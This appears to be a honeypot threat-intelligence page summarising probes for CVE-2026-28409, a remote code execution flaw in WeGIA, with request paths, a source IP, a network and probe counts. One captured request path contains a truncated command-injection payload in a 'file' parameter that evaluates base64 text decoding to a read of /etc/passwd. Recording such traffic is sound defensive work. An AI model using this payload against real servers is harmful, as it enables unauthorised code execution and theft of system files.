CVE-2026-28409: WeGIA <= 3.6.4 - Remote Code Execution

HoneyLabs honeypots recorded 2 probes matching CVE-2026-28409 from 1 distinct source IP addresses in the last 7 days. Severity is rated CRITICAL.

Request paths that identify it

  • /WeGIA/html/login.php
  • /WeGIA/html/configuracao/gerenciar_backup.php?action=restore&file=dump%3Bexport+F%3D%3Beval+%24%28echo+Y2F0IC9ldGMvcGFzc…
  • /WeGIA/html/configuracao/importar_dump.php

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2142Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited21

Captured requests

  • /WeGIA/html/login.php

CVE report

CVE report

Open a specific CVE from the CVE tracker.